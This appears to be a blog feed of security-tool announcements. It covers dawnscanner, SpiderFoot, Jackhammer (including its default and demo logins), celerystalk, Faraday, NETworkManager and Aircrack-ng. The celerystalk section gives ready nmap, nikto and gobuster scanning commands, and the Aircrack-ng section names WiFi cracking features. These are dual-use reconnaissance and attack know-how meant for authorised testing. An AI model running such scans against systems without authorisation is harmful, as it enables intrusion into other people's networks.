    --list-known-framework list ruby MVC frameworks supported by dawn
    --list-scan-registry list past scan informations stored in scan registry

    Service flags

    -D, --debug enters dawn debug mode
    -V, --verbose the output will be more verbose
    -v, --version show version information
    -h, --help show this help

    Rake task
    To include dawnscanner in your rake task list, you simply have to put this line in your Rakefile
    require 'dawn/tasks'
    Then executing $ rake -T you will have a dawn:run task you want to execute.
    $ rake -T
    ...
    rake dawn:run # Execute dawnscanner on the current directory
    ...

    Interacting with the knowledge base
    You can dump all security checks in the knowledge base this way
    $ dawn --list-knowledge-base
    Useful in scripts, you can use --search-knowledge-base or -S with as parameter the check name you want to see if it's implemented as a security control or not.
    $ dawn -S CVE-2013-6421
    07:59:30 [*] dawn v1.1.0 is starting up
    CVE-2013-6421 found in knowledgebase.

    $ dawn -S this_test_does_not_exist
    08:02:17 [*] dawn v1.1.0 is starting up
    this_test_does_not_exist not found in knowledgebase

    dawnscanner security scan in action
    As output, dawnscanner will put all security checks that are failed during the scan.
    This the result of Codedake::dawnscanner running against a Sinatra 1.4.2 web application wrote for a talk I delivered in 2013 at Railsberry conference.
    As you may see, dawnscanner first detects MVC running the application by looking at Gemfile.lock, than it discards all security checks not appliable to Sinatra (49 security checks, in version 1.0, especially designed for Ruby on Rails) and it applies them.
    $ dawn ~/src/hacking/railsberry2013
    18:40:27 [*] dawn v1.1.0 is starting up
    18:40:27 [$] dawn: scanning /Users/thesp0nge/src/hacking/railsberry2013
    18:40:27 [$] dawn: sinatra v1.4.2 detected
    18:40:27 [$] dawn: applying all security checks
    18:40:27 [$] dawn: 109 security checks applied - 0 security checks skipped
    18:40:27 [$] dawn: 1 vulnerabilities found
    18:40:27 [!] dawn: CVE-2013-1800 check failed
    18:40:27 [$] dawn: Severity: high
    18:40:27 [$] dawn: Priority: unknown
    18:40:27 [$] dawn: Description: The crack gem 0.3.1 and earlier for Ruby does not properly restrict casts of string values, which might allow remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion, a similar vulnerability to CVE-2013-0156.
    18:40:27 [$] dawn: Solution: Please use crack gem version 0.3.2 or above. Correct your gemfile
    18:40:27 [$] dawn: Evidence:
    18:40:27 [$] dawn: Vulnerable crack gem version found: 0.3.1
    18:40:27 [*] dawn is leaving

    When you run dawnscanner on a web application with up to date dependencies, it's likely to return a friendly no vulnerabilities found message. Keep it up working that way!
    This is dawnscanner running against a Padrino web application I wrote for a scorecard quiz game about application security. Italian language only. Sorry.
    18:42:39 [*] dawn v1.1.0 is starting up
    18:42:39 [$] dawn: scanning /Users/thesp0nge/src/CORE_PROJECTS/scorecard
    18:42:39 [$] dawn: padrino v0.11.2 detected
    18:42:39 [$] dawn: applying all security checks
    18:42:39 [$] dawn: 109 security checks applied - 0 security checks skipped
    18:42:39 [*] dawn: no vulnerabilities found.
    18:42:39 [*] dawn is leaving
    If you need a fancy HTML report about your scan, just ask it to dawnscanner with the --html flag used with the --file since I wanto to save the HTML to disk.
    $ dawn /Users/thesp0nge/src/hacking/rt_first_app --html --file report.html

    09:00:54 [*] dawn v1.1.0 is starting up
    09:00:54 [*] dawn: report.html created (2952 bytes)
    09:00:54 [*] dawn is leaving

    Useful links
    Project homepage: http://dawnscanner.org
    Twitter profile: @dawnscanner
    Github repository: https://github.com/thesp0nge/dawnscanner
    Mailing list: https://groups.google.com/forum/#!forum/dawnscanner

    Thanks to
    saten: first issue posted about a typo in the README
    presidentbeef: for his outstanding work that inspired me creating dawn and for double check comparison matrix. Issue #2 is yours :)
    marinerJB: for misc bug reports and further ideas
    Matteo: for ideas on API and their usage with github.com hooks


    SpiderFoot - The Most Complete OSINT Collection And Reconnaissance Tool

    $
    0
    0

    SpiderFoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN or person's name.
    SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organisation is freely providing for attackers to use against you.

    What is SpiderFoot?

    SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more. You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.

    What is OSINT?

    OSINT (Open Source Intelligence) is data available in the public domain which might reveal interesting information about your target. This includes DNS, Whois, Web pages, passive DNS, spam blacklists, file meta data, threat intelligence lists as well as services like SHODAN, HaveIBeenPwned? and more. See the full list of data sources SpiderFoot utilises.

    What can I do with SpiderFoot?

    The data returned from a SpiderFoot scan will reveal a lot of information about your target, providing insight into possible data leaks, vulnerabilities or other sensitive information that can be leveraged during a penetration test, red team exercise or for threat intelligence. Try it out against your own network to see what you might have exposed!

    Read more at the project website: http://www.spiderfoot.net


    Jackhammer - One Security Vulnerability Assessment/Management Tool To Solve All The Security Team Problems

    $
    0
    0

    One Security vulnerability assessment/management tool to solve all the security team problems.

    What is Jackhammer?
    Jackhammer is a collaboration tool built with an aim of bridging the gap between Security team vs dev team, QA team and being a facilitator for TPM to understand and track the quality of the code going into production. It could do static code analysis and dynamic analysis with inbuilt vulnerability management capability. It finds security vulnerabilities in the target applications and it helps security teams to manage the chaos in this new age of continuous integration and continuous/multiple deployments.
    It completely works on RBAC (Role Based Access Control). There are cool dashboards for individual scans and team scans giving ample flexibility to collaborate with different teams. It is totally built on pluggable architecture which can be integrated with any open source/commercial tool.
    Jackhammer uses the OWASP pipeline project to run multiple open source and commercial tools against your code,web app, mobile app, cms (wordpress), network.

    Key Features:
    • Provides unified interface to collaborate on findings
    • Scanning (code) can be done for all code management repositories
    • Scheduling of scans based on intervals # daily, weekly, monthly
    • Advanced false positive filtering
    • Publish vulnerabilities to bug tracking systems
    • Keep a tab on statistics and vulnerability trends in your applications
    • Integrates with majority of open source and commercial scanning tools
    • Users and Roles management giving greater control
    • Configurable severity levels on list of findings across the applications
    • Built-in vulnerability status progression
    • Easy to use filters to review targeted sets from tons of vulnerabilities
    • Asynchronous scanning (via sidekiq) that scale
    • Seamless Vulnerability Management
    • Track statistics and graph security trends in your applications
    • Easily integrates with a variety of open source, commercial and custom scanning tools

    Supported Vulnerability Scanners:

    Static Analysis:
       * license required      ** commercial license required

    Finding hard coded secrets/tokens/creds:
    • Trufflehog (Slightly modified/extended for better result and integration as of May 2017)

    Webapp:

    Mobile App:
    • Androbugs (Slightly modified/extended for better result and integration as of May 2017)
    • Androguard (Slightly modified/extended for better result and integration as of May 2017)

    Wordpress:
    • WPScan (Slightly modified/extended for better result and integration as of May 2017)

    Network:

    Adding Custom (other open source/commercial /personal) Scanners:
    You can add any scanner to jackhammer within 10-30 minutes. Check the links/video

    Quick Start and Installation
    See our Quick Start/Installation Guide if you want to try out Jackhammer as quickly as possible using Docker Compose.

    Run the following commands for local setup (corporate mode):
     git clone https://github.com/olacabs/jackhammer
    sh ./docker-build.sh

    Default credentials for local setup:
    username: jackhammer@olacabs.com
    password: j4ckh4mm3r

    (For single user mode)
    sh ./docker-build.sh SingleUser
    do signup for access

    Restarting Jackhammer
    docker-compose stop
    docker-compose rm
    docker-compose up -d

    User Guide
    The User Guide will give you an overview of how to use Jackhammer once you have things up and running.

    Demo

    Demo Environment Link:
    https://jch.olacabs.com/

    Default credentials:
    username: admin@admin.com
    password: admin@admin.com

    Credits
    Sentinels Team @Ola

    Shout-out to:
    -Madhu
    -Habi
    -Krishna
    -Shreyas
    -Krutarth
    -Naveen
    -Mohan


    Celerystalk - An Asynchronous Enumeration and Vulnerability Scanner

    $
    0
    0

    celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.
    • Configurable - Some common tools are in the default config, but you can add any tool you want
    • Service Aware - Uses nmap/nessus service names rather than port numbers to decide which tools to run
    • Scalable - Designed for scanning multiple hosts, but works well for scanning one host at a time
    • VirtualHosts - Supports subdomain recon and virtualhost scanning
    • Job Control - Supports canceling, pausing, and resuming of tasks, inspired by Burp scanner
    • Screenshots Automatically takes screenshots of every url identified via brute force (gobuster) and spidering (Photon)

    Install/Setup
    • Supported Operating Systems: Kali
    • Supported Python Version: 2.x
    You must install and run celerystalk as root
    # git clone https://github.com/sethsec/celerystalk.git
    # cd celerystalk/setup
    # ./install.sh
    # cd ..
    # ./celerystalk -h
    You must install and run celerystalk as root

    Using celerystalk - The basics
    [CTF/HackTheBox mode] - How to scan a host by IP
    # nmap 10.10.10.10 -Pn -p- -sV -oX tenten.xml                       # Run nmap
    # ./celerystalk workspace create -o /htb # Create default workspace and set output dir
    # ./celerystalk import -f tenten.xml # Import scan
    # ./celerystalk db services # If you want to see what services were loaded
    # ./celerystalk scan # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Watch scans as move from pending > running > complete
    # ./celerystalk report # Generate report
    # firefox /htb/celerystalkReports/Workspace-Report[Default.html] & # View report
    [Vulnerability Assessment Mode] - How to scan a list of in-scope hosts/networks and any subdomains that resolve to any of the in-scope IPs
    # nmap -iL client-inscope-list.txt -Pn -p- -sV -oX client.xml       # Run nmap
    # ./celerystalk workspace create -o /assessments/client # Create default workspace and set output dir
    # ./celerystalk import -f client.xml -S scope.txt # Import scan and scope files
    # ./celerystalk subdomains -d client.com,client.net # Find subdomains and determine if in scope
    # ./celerystalk scan # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish
    # ./celerystalk report # Generate report
    # firefox <path>/celerystalkReports/Workspace-Report[Default].html &# View report
    [URL Mode] - How to scan a a URL (Use this mode to scan sub-directories found during first wave of scans).
    # ./celerystalk workspace create -o /assessments/client             # Create default workspace and set output dir
    # ./celerystalk scan -u http://10.10.10.10/secret_folder/ # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish
    # ./celerystalk report # Generate report
    # firefox <path>/celerystalkReports/Workspace-Report[Default].html &# View report

    Using celerystalk - Some more detail
    1. Configure which tools you'd like celerystalk to execute: The install script drops a config.ini file in the celerystalk folder. The config.ini script is broken up into three sections:
      Service Mapping - The first section normalizes Nmap & Nessus service names for celerystalk (this idea was created by @codingo_ in Reconnoitre AFAIK).
      [nmap-service-names]
      http = http,http-alt,http-proxy,www,http?
      https = ssl/http,https,ssl/http-alt,ssl/http?
      ftp = ftp,ftp?
      mysql = mysql
      dns = dns,domain,domain
      Domain Recon Tools - The second section defines the tools you'd like to use for subdomain discovery (an optional feature):
      [domain-recon]
      amass : /opt/amass/amass -d [DOMAIN]
      sublist3r : python /opt/Sublist3r/sublist3r.py -d [DOMAIN]
      Service Configuration - The rest of the confi.ini sections define which commands you want celerystalk to run for each identified service (i.e., http, https, ssh).
      • Disable any command by commenting it out with a ; or a #.
      • Add your own commands using [TARGET],[PORT], and [OUTPUT] placeholders.
      Here is an example:
      [http]
      whatweb : whatweb http://[TARGET]:[PORT] -a3 --colour=never > [OUTPUT].txt
      cewl : cewl http://[TARGET]:[PORT]/ -m 6 -w [OUTPUT].txt
      curl_robots : curl http://[TARGET]:[PORT]/robots.txt --user-agent 'Googlebot/2.1 (+http://www.google.com/bot.html)' --connect-timeout 30 --max-time 180 > [OUTPUT].txt
      nmap_http_vuln : nmap -sC -sV -Pn -v -p [PORT] --script=http-vuln* [TARGET] -d -oN [OUTPUT].txt -oX [OUTPUT].xml --host-timeout 120m --script-timeout 20m
      nikto : nikto -h http://[TARGET] -p [PORT] &> [OUTPUT].txt
      gobuster-common : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -n -q > [OUTPUT].txt
      photon : python /opt/Photon/photon.py -u http://[TARGET]:[PORT] -o [OUTPUT]
      ;gobuster_2.3-medium : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s '200,204,301,307,403,500' -e -n -q > [OUTPUT].txt
    2. Run Nmap or Nessus:
      • Nmap: Run nmap against your target(s). Required: enable version detection (-sV) and output to XML (-oX filename.xml). All other nmap options are up to you. Here are some examples:
         nmap target(s) -Pn -p- -sV -oX filename.xml 
        nmap -iL target_list.txt -Pn -sV -oX filename.xml
      • Nessus: Run nessus against your target(s) and export results as a .nessus file
    3. Create worksapce:
      OptionDescription
      no optionsPrints current workspace
      createCreates new workspace
      -wDefine new workspace name
      -oDefine output directory assigned to workspace
        Create default workspace    ./celerystalk workspace create -o /assessments/client
      Create named workspace ./celerystalk workspace create -o /assessments/client -w client
      Switch to another worksapce ./celerystalk workspace client
    4. Import Data: Import data into celerystalk
      OptionDescription
      -f scan.xmlNmap/Nessus xml
      • Adds all IP addresses from this file to hosts table and marks them all in scope to be scanned.
      • Adds all ports and service types to services table.
      -S scope.txtScope file
      • Show file differences that haven't been staged
      -D subdomains.txt(sub)Domains file
      • celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      Import Nmap XML file:       ./celerystalk import -f /assessments/nmap.xml 
      Import Nessus file: ./celerystalk import -f /assessments/scan.nessus
      Import list of Domains: ./celerystalk import -D <file>
      Import list of IPs/Ranges: ./celerystalk import -S <file>
      Specify workspace: ./celerystalk import -f <file>
      Import multiple files: ./celerystalk import -f nmap.xml -S scope.txt -D domains.txt
    5. Find Subdomains (Optional): celerystalk will perform subdomain recon using the tools specified in the config.ini.
      OptionDescription
      -d domain1,domain2,etcRun Amass, Sublist3r, etc. and store domains in DB
      • After running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      Find subdomains:       celerystalk subdomains -d domain1.com,domain2.com
    6. Launch Scan: I recommend using the import command first and running scan with no options, however you do have the option to do it all at once (import and scan) by using the flags below. celerystalk will submit tasks to celery which asynchronously executes them and logs output to your output directory.
      OptionDescription
      no optionsScan all in scope hosts
      • Reads DB and scans every in scope IP and subdomain.
      • Launches all enabled tools for IPs, but only http/http specific tools against virtualhosts
      -t ip,vhost,cidrScan specific target(s) from DB or scan file
      • Scan a subset of the in scope IPs and/or subdomains.
      -sSimulation
      Sends all of the tasks to celery, but all commands are executed with a # before them rendering them inert.
      Use these only if you want to skip the import phase and import/scan all at once
      -f scan.xmlImport and process Nmap/Nessus xml before scan
      • Adds all IP addresses from this file to hosts table and marks them all in scope to be scanned.
        Adds all ports and service types to services table.
      -S scope.txtImport and process scope file before scan
      • Show file differences that haven't been staged.
      -D subdomains.txtImport and process (sub)domains file before scan
      • celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      -d domain1,domain2,etcFind Subdomains and scan in scope hosts
      • After running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      Scan imported hosts/subdomains
      Scan all in scope hosts:    ./celerystalk scan    
      Scan subset of DB hosts: ./celerystalk scan -t 10.0.0.1,10.0.0.3
      ./celerystalk scan -t 10.0.0.100-200
      ./celerystalk scan -t 10.0.0.0/24
      ./celerystalk scan -t sub.domain.com
      Simulation mode: ./celerystalk scan -s
      Import and Scan
      Start from Nmap XML file:   ./celerystalk scan -f /pentest/nmap.xml -o /pentest
      Start from Nessus file: ./celerystalk scan -f /pentest/scan.nessus -o /pentest
      Scan all in scope vhosts: ./celerystalk scan -f <file> -o /pentest -d domain1.com,domain2.com
      Scan subset hosts in XML: ./celerystalk scan -f <file> -o /pentest -t 10.0.0.1,10.0.0.3
      ./celerystalk scan -f <file> -o /pentest -t 10.0.0.100-200
      ./celerystalk scan -f <file> -o /pentest -t 10.0.0.0/24
      Simulation mode: ./celerystalk scan -f <file> -o /pentest -s
    7. Rescan: Use this command to rescan an already scanned host.
      OptionDescription
      no optionFor each in scope host in the DB, celerystalk will ask if if you want to rescan it
      -t ip,vhost,cidrScan a subset of the in scope IPs and/or subdomains.
      Rescan all hosts:           ./celerystalk rescan
      Rescan some hosts ./celerystalk rescan-t 1.2.3.4,sub.domain.com
      Simulation mode: ./celerystalk rescan -s
    8. Query Status: Asynchronously check the status of the tasks queue as frequently as you like. The watch mode actually executes the linux watch command so you don't fill up your entire terminal buffer.
      OptionDescription
      no optionsShows all tasks in the defualt workspace
      watchSends command to the unix watch command which will let you get an updated status every 2 seconds
      briefLimit of 5 results per status (pending/running/completed/cancelled/paused)
      summaryShows only a banner with numbers and not the tasks themselves
      Query Tasks:                ./celerystalk query 
      ./celerystalk query watch
      ./celerystalk query brief
      ./celerystalk query summary
      ./celerystalk query summary watch
    9. Cancel/Pause/Resume Tasks: Cancel/Pause/Resume any task(s) that are currently running or in the queue.
      OptionDescription
      cancel
      • Canceling a running task will send a kill -TERM
      • Canceling a queued task* will make celery ignore it (uses celery's revoke).
      • Canceling all tasks* will kill running tasks and revoke all queued tasks.
      pause
      • Pausing a single task uses kill -STOP to suspend the process.
      • Pausing all tasks* attemps to kill -STOP all running tasks, but it is a little wonky and you mind need to run it a few times. It is possible a job completed before it was able to be paused, which means you will have a worker that is still accepting new jobs.
      resume
      • Resuming tasks* sends a kill -CONT which allows the process to start up again where it left off.
      Cancel/Pause/Resume Tasks:  ./celerystalk <verb> 5,6,10-20          #Cancel/Pause/Resume tasks 5, 6, and 10-20 from current workspace
      ./celerystalk <verb> all #Cancel/Pause/Resume all tasks from current workspaces
    10. Run Report: Run a report which combines all of the tool output into an html file and a txt file. Run this as often as you like. Each time you run the report it overwrites the previous report.
      Create Report:              ./celerystalk report                    #Create a report for all scanneed hosts in current workspace
      Screenshot:

    11. Access the DB: List the workspaces, hosts, services, or paths stored in the celerystalk database
      OptionDescription
      workspacesShow all known workspaces and the output directory associated with each workspace
      servicesShow all known open ports and service types by IP
      hostsShow all hosts (IP addresses and subdomains/vhosts) and whether they are in scope and whether they have been submitted for scanning
      pathsShow all paths that have been identified by vhost
      -w workspaceSpecify a non-default workspace
      Show workspaces:            ./celeryststalk db workspaces
      Show services: ./celeryststalk db services
      Show hosts: ./celeryststalk db hosts
      Show paths: ./celeryststalk db paths
    12. Export DB: Export each table of the DB to a csv file
      OptionDescription
      no optionsExport the services, hosts, and paths table from the default database
      -w workspaceSpecify a non-default workspace
      Export current DB:        ./celerystalk db export
      Export another DB: ./celerystalk db export -w test

    Usage
    Usage:
    celerystalk workspace create -o <output_dir> [-w workspace_name]
    celerystalk workspace [<workspace_name>]
    celerystalk import [-f <nmap_file>] [-S scope_file] [-D subdomains_file] [-u <url>]
    celerystalk subdomains -d <domains> [-s]
    celerystalk scan [-f <nmap_file>] [-t <targets>] [-d <domains>] [-S scope_file] [-D subdomains_file] [-s]
    celerystalk scan -u <url> [-s]
    celerystalk rescan [-t <targets>] [-s]
    celerystalk query ([full] | [summary] | [brief]) [watch]
    celerystalk query [watch] ([full] | [summary] | [brief])
    celerystalk report
    celerystalk cancel ([all]|[<task_ids>])
    celerystalk pause ([all]|[<task_ids>])
    celerystalk resume ([all]|[<task_ids>])
    celerystalk db ([workspaces] | [services] | [hosts] | [vhosts] | [paths])
    celerystalk db export
    celerystalk shutdown
    celerystalk interactive
    celerystalk (help | -h | --help)

    Options:
    -h --help Show this screen
    -v --version Show version
    -f <nmap_file> Nmap xml import file
    -o <output_dir> Output directory
    -S <scope_file> Scope import file
    -D <subdomains_file> Subdomains import file
    -t <targets> Target(s): IP, IP Range, CIDR
    -u <url> URL to parse and scan with all configured tools
    -w <workspace> Workspace
    -d --domains Domains to scan for vhosts
    -s --simulation Simulation mode. Submit tasks comment out all commands

    Examples:

    Workspace
    Create default workspace celerystalk workspace create -o /assessments/client
    Create named workspace celerystalk workspace create -o /assessments/client -w client
    Switch to another worksapce celerystalk workspace client2

    Import
    Import Nmap XML file: celerystalk import -f /assessments/nmap.xml
    Import Nessus file: celerystalk import -f /assessments/scan.nessus
    Import list of Domains: celerystalk import -D <file>
    Import list of IPs/Ranges: celerystalk import -S <file>
    Import multiple files: celerystalk import -f nmap.xml -S scope.txt -D domains.txt

    Subdomain Recon
    Find subdomains: celerystalk subdomains -d domain1.com,domain2.com

    Scan
    Scan all in scope hosts: celerystalk scan
    Scan subset of DB hosts: celerystalk scan -t 10.0.0.1,10.0.0.3
    celerystalk scan -t 10.0.0.100-200
    celerystalk scan -t 10.0.0.0/24
    celerystalk scan -t sub.domain.com
    Simulation mode: celerystalk scan -s

    Import and Scan
    Start from Nmap XML file: celerystalk scan -f /pentest/nmap.xml
    Start from Nessus file: celerystalk scan -f /pentest/scan.nessus
    Scan subset hosts in XML: celerystalk scan -f <file> -t 10.0.0.1,10.0.0.3
    celerystalk scan -f <file> -t 10.0.0.100-200
    celerystalk scan -f <file> -t 10.0.0.0/24
    celerystalk scan -f <file> -t sub.domain.com
    Simulation mode: celerystalk scan -f <file> -s

    Rescan
    Rescan all hosts: celerystalk rescan
    Rescan some hosts celerystalk rescan-t 1.2.3.4,sub.domain.com
    Simulation mode: celerystalk rescan -s

    Query Mode
    All tasks: celerystalk query
    Update status every 2s: celerystalk query watch
    Show only 5 tasks per mode: celerystalk query brief
    Show stats only celerystalk query summary
    Show stats every 2s: celerystalk query summary watch

    Job Control (cancel/pause/resume)
    Specific tasks: celerystalk cancel 5,6,10-20
    celerystalk pause 5,6,10-20
    celerystalk resume 5,6,10-20

    All tasks current worspace: celerystalk cancel all
    celerystalk pause all
    celerystalk resume all

    Access the DB
    Show workspaces: celeryststalk db workspaces
    Show services: celeryststalk db services
    Show hosts: celeryststalk db hosts
    Show vhosts only celeryststalk db vhosts
    Show paths: celeryststalk db paths

    Export DB
    Export current DB: celerystalk db export

    Credit
    This project was inspired by many great tools:
    1. https://github.com/codingo/Reconnoitre by @codingo_
    2. https://github.com/frizb/Vanquish by @frizb
    3. https://github.com/leebaird/discover by @discoverscripts
    4. https://github.com/1N3/Sn1per
    5. https://github.com/SrFlipFlop/Network-Security-Analysis by @SrFlipFlop
    Thanks to @offensivesecurity and @hackthebox_eu for their lab networks
    Also, thanks to:
    1. @decidedlygray for pointing me towards celery, helping me solve python problems that were over my head, and for the extensive beta testing
    2. @kerpanic for inspiring me to dust off an old project and turn it into celerystalk
    3. My TUV OpenSky team and my IthacaSec hackers for testing this out and submitting bugs and features


    Faraday v3.4 - Collaborative Penetration Test and Vulnerability Management Platform

    $
    0
    0

    Here’s the main new features and improvements in Faraday v3.4:

    Services can now be tagged. With this new feature, you can now easily identify important services, geolocate them and more.
    New search operators OR/NOT
    In a previous release we added the AND operator, now with 3.4 you can also use OR and NOT operators in the Status Report search box.
    This will allow you to find vulnerabilities easily with filters like this one:
    (severity:critical or severity:high) or name:”MS18-172”
    Performance improvements for big workspaces
    We have been working on optimization for our API Rest endpoints to support millions of vulnerabilities in each workspace.

    Here is the full change log for version 3.4
    • In GTK, check active_workspace it's not null
    • Add fbruteforce services fplugin
    • Attachments can be added to a vulnerability through the API.
    • Catch gaierror error on lynis plugin
    • Add OR and NOT with parenthesis support on status report search
    • Info API now is public
    • Web UI now detects Appscan plugin
    • Improve performance on the workspace using custom query
    • Workspaces can be set as active/disable in the welcome page.
    • Change Nmap plugin, response field in VulnWeb now goes to Data field.
    • Update code to support latest SQLAlchemy version
    • Fix `create_vuln` fplugin bug that incorrectly reported duplicated vulns
    • The client can set a custom logo to Faraday
    • Centered checkboxes in user list page
    • Client or pentester can't activate/deactivate workspaces
    • In GTK, dialogs now check that user_info is not False
    • Add tags in Service object (Frontend and backend API)
    • Limit of users only takes the active ones
    • Improve error message when the license is not valid



    NETworkManager - A Powerful Tool For Managing Networks And Troubleshoot Network Problems!

    $
    0
    0

    A powerful tool for managing networks and troubleshoot network problems!

    Features
    • Network Interface - Information, Configure
    • IP-Scanner
    • Port-Scanner
    • Ping
    • Traceroute
    • DNS Lookup
    • Remote Desktop
    • PuTTY (requires PuTTY)
    • TightVNC (requires TightVNC)
    • SNMP - Get, Walk, Set (v1, v2c, v3)
    • Wake on LAN
    • HTTP Headers
    • Whois
    • Subnet Calculator - Calculator, Subnetting, Supernetting
    • Lookup - OUI, Port
    • Connections
    • Listeners
    • ARP Table

    Languages
    • English
    • German
    • Russian
    • Spanish

    System requirements

    Aircrack-ng 1.5 - Complete Suite Of Tools To Assess WiFi Network Security

    $
    0
    0

    Aircrack-ng is a complete suite of tools to assess WiFi network security.
    It focuses on different areas of WiFi security:
    • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
    • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
    • Testing: Checking WiFi cards and driver capabilities (capture and injection).
    • Cracking: WEP and WPA PSK (WPA 1 and 2).
    All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

    Building

    Requirements
    • Autoconf
    • Automake
    • Libtool
    • shtool
    • OpenSSL development package or libgcrypt development package.
    • Airmon-ng (Linux) requires ethtool.
    • On windows, cygwin has to be used and it also requires w32api package.
    • On Windows, if using clang, libiconv and libiconv-devel
    • Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.
    • pkg-config (pkgconf on FreeBSD)
    • FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
    • Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

    Optional stuff
    • If you want SSID filtering with regular expression in airodump-ng (-essid-regex) pcre development package is required.
    • If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
    • If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.
    • In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng, libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)
    • For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc8
    • rfkill
    • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
    • CMocka for unit testing

    Installing required and optional dependencies
    Below are instructions for installing the basic requirements to build aircrack-ng for a number of operating systems.
    Note: CMocka should not be a dependency when packaging Aircrack-ng.

    Linux

    Debian/Ubuntu
    sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev

    Fedora/CentOS/RHEL
    sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel

    BSD

    FreeBSD
    pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

    DragonflyBSD
    pkg install pkgconf shtool libtool gcc7 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

    OpenBSD
    pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

    OSX
    XCode, Xcode command line tools and HomeBrew are required.
    brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

    Windows

    Cygwin
    Cygwin requires the full path to the setup.exe utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.
    An example of automatically installing all the dependencies is as follows:
    c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P openssl-devel -P libsqlite3-devel

    MSYS2
    pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

    Compiling
    To build aircrack-ng, the Autotools build system is utilized. Autotools replaces the older method of compilation.
    NOTE: If utilizing a developer version, eg: one checked out from source control, you will need to run a pre-configure script. The script to use is one of the following: autoreconf -i or env NOCONFIGURE=1 ./autogen.sh.
    First, ./configure the project for building with the appropriate options specified for your environment:
    ./configure <options>
    TIP: If the above fails, please see above about developer source control versions.
    Next, compile the project (respecting if make or gmake is needed):
    • Compilation:
      make
    • Compilation on *BSD or Solaris:
      gmake
    Finally, the additional targets listed below may be of use in your environment:
    • Execute all unit testing:
      make check
    • Installing:
      make install
    • Uninstall:
      make uninstall

    ./configure flags
    When configuring, the following flags can be used and combined to adjust the suite to your choosing:
    • with-airpcap=DIR: needed for supporting airpcap devices on windows (cygwin or msys2 only) Replace DIR above with the absolute location to the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (Compatible with version 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
    • with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.
    • with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: Each script has its own dependencies.
    • with-gcrypt: Use libgcrypt crypto library instead of the default OpenSSL. And also use internal fast sha1 implementation (borrowed from GIT) Dependency (Debian): libgcrypt20-dev
